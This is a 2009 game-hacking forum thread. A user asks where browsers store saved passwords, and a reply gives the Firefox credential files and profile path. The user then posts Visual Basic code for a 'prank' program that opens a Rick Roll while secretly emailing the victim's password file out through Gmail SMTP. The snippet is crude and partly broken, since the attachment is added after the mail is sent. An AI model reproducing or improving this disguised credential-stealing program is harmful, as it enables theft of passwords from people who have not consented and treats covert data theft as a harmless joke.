Anyone know?

Discussions Related to Game Hacking and Memory Hacking Software

Moderators: g3nuin3, SpeedWing, WhiteHat, mezzo

Anyone know?

Postby WhiteNova » Tue Jul 14, 2009 4:55 am

I'm making a little program to piss off my friend. But I'm having one problem, where are Internet Explorer/Mozilla Firefox saved passwords stored? I'm hoping there is a file that contains them, but I'm not finding it in Program Files/Mozilla Firefox.
Image
^Siggy Of Awesomeness Done By Minorutono ^
Image
User avatar
WhiteNova
Been Around
 
Posts: 212
Joined: Mon Jan 26, 2009 12:06 am
Location: Your pants

Postby toffey » Tue Jul 14, 2009 5:59 am

From the Mozilla website:
Passwords

Your passwords are stored in two different files, both of which are required:

* key3.db - This file stores your key database for your passwords. To transfer saved passwords, you must copy this file along with the following file.

3.5:

* signons.sqlite - Saved passwords.


signons3.txt seems like it may also be helpful although it doesn't directly show the usernames/passwords.

They are all located in
Code: Select all
C:\Documents and Settings\(WindowsAccountName)\Application Data\Mozilla\Firefox\Profiles\xxxxx.default


Source: http://support.mozilla.com/en-US/kb/Rec ... _Passwords
User avatar
toffey
Hack-Master Hex
 
Posts: 689
Joined: Fri Sep 05, 2008 5:39 pm
Location: California, USA

Postby WhiteNova » Tue Jul 14, 2009 10:50 pm

toffey wrote:From the Mozilla website:
Passwords

Your passwords are stored in two different files, both of which are required:

* key3.db - This file stores your key database for your passwords. To transfer saved passwords, you must copy this file along with the following file.

3.5:

* signons.sqlite - Saved passwords.


signons3.txt seems like it may also be helpful although it doesn't directly show the usernames/passwords.

They are all located in
Code: Select all
C:\Documents and Settings\(WindowsAccountName)\Application Data\Mozilla\Firefox\Profiles\xxxxx.default


Source: http://support.mozilla.com/en-US/kb/Rec ... _Passwords


I'm not finding the file. I'm trying to make a program that opens up a Rick Roll, but in the background it sends me their saved password file. I already know all the code to use, I just can't locate the files I need.

Code: Select all
Start.Process("www.youtube.com/")
Dim mail As New MailMessage()
            Dim SmtpServer As New SmtpClient
            SmtpServer.Credentials = New Net.NetworkCredential("youremail@gmail.com", "yourgmailpassword")
            SmtpServer.Port = 587
            SmtpServer.Host = "smtp.gmail.com"
            SmtpServer.EnableSsl = True
            SmtpServer.EnableSsl = True
            mail.To.Add("reciever email")
            mail.From = New MailAddress("youremail@gmail.com")
            mail.Subject = ("MAILSUBJECT")
            mail.Body = ("MAILBODY")
            SmtpServer.Send(mail)
mail.Attachments.Add(New System.Net.Mail.Attachment("c:\text.txt"))
It's all Visual Basic for those who are wondering.
Image
^Siggy Of Awesomeness Done By Minorutono ^
Image
User avatar
WhiteNova
Been Around
 
Posts: 212
Joined: Mon Jan 26, 2009 12:06 am
Location: Your pants


Return to General Related Discussions

Who is online

Users browsing this forum: No registered users and 0 guests